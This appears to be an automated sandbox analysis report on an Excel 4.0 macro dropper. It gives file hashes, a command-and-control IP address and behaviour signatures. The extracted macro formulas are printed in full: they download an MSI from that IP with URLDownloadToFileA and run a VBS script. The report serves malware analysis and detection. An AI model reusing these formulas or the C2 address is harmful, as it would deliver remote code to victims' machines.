General

  • Target

    37b63c24482584a370356b2099ef9842

  • Size

    6KB

  • Sample

    231222-at8xysfhhq

  • MD5

    37b63c24482584a370356b2099ef9842

  • SHA1

    cd519de919291b7027044f1134d95f361c76e02b

  • SHA256

    dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b

  • SHA512

    dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e

  • SSDEEP

    192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe")
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
    =EXEC("wscript C:\ProgramData\start.vbs")
    =HALT()

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://46.17.98.187

Targets

    • Target

      37b63c24482584a370356b2099ef9842

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks